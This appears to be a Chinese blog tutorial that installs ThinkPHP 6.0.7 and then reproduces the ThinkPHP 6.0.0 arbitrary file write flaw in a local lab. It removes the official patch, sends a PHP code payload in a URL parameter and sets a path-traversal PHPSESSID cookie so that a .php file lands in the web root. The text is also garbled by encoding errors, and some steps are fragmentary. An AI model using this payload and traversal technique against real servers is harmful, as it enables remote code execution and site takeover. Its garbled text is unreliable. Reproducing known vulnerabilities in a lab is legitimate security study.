如何進(jìn)行tinkphp6.0.7的安裝以及thinkphp6.0.0任意文件寫入漏洞復(fù)現(xiàn)

這篇文章給大家介紹如何進(jìn)行tinkphp6.0.7的安裝以及thinkphp6.0.0任意文件寫入漏洞復(fù)現(xiàn)，內(nèi)容非常詳細(xì)，感興趣的小伙伴們可以參考借鑒，希望對大家能有所幫助。

tinkphp6.0.7的安裝

一、首先準(zhǔn)備環(huán)境phpstudy7.1.13

二、再準(zhǔn)備Composer安裝程序，安裝到phpstudy7.1.13路徑下

這個路徑隨意

這個路徑就可以

進(jìn)入該命令行之后執(zhí)行命令進(jìn)行安裝

composer create-project topthink/think tp

下載之后將tp文件夾，移動到自己習(xí)慣訪問的文件夾下面

配置信息

修改配置文件的

/tp/config ##路徑

上一個修改錯了

app_nameespace true改成flase

驗(yàn)證傳參信息

tp6.0.0任意文件寫入漏洞復(fù)現(xiàn):

一、首先下載源碼

composer create-project topthink/think tp 6.0.0

然后移動到要放到網(wǎng)站目錄下面

之后訪問：http://127.0.0.1:8086/cms2021/tp/public/

發(fā)現(xiàn)安裝成功：

6.0.0 版本號

php think run 運(yùn)行開發(fā)環(huán)境

二、部署漏洞環(huán)境

漏洞文件位置：

\tp\vendor\topthink\framework\src\think\session\Store.php

注意要點(diǎn)：

1.刪除官方打的補(bǔ)丁-->ctype_alnum函數(shù)

在121行把補(bǔ)丁給去掉

去掉后

32個字符個數(shù)，

UA頭或者是cookie信息

2.步驟二：添加一個可以

\tp\app\controller\index.php添加

use think\facade\Session; //session

$test=request()->only(['a']); //index方法中寫入
Session::set("test",$test['a']); //index方法中寫入

注意添加位置

3.步驟三:打開接受seeion會話

tp\app\middleware.php 打開session信息

\think\middleware\SessionInit::class

三、漏洞復(fù)現(xiàn)

http://127.0.0.1/tp/public/index.php?a=%3C?php%20phpinfo();?%3E

如果執(zhí)行這一個的話，會發(fā)現(xiàn)沒有任何回顯，我們可以去他的網(wǎng)站根目錄去查看

\tp\runtime\session

發(fā)現(xiàn)是以序列化的形式進(jìn)來的

四、抓包修改session會話寫入網(wǎng)站根目錄

PHPSESSID=../../../../123456789chongxqweq.php 要寫入的文件

注意：如果PHPSESSID要滿足32位字符，如果上傳不成功的話，那么就刪刪減減，直到上傳成功為止

驗(yàn)證

關(guān)于如何進(jìn)行tinkphp6.0.7的安裝以及thinkphp6.0.0任意文件寫入漏洞復(fù)現(xiàn)就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學(xué)到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。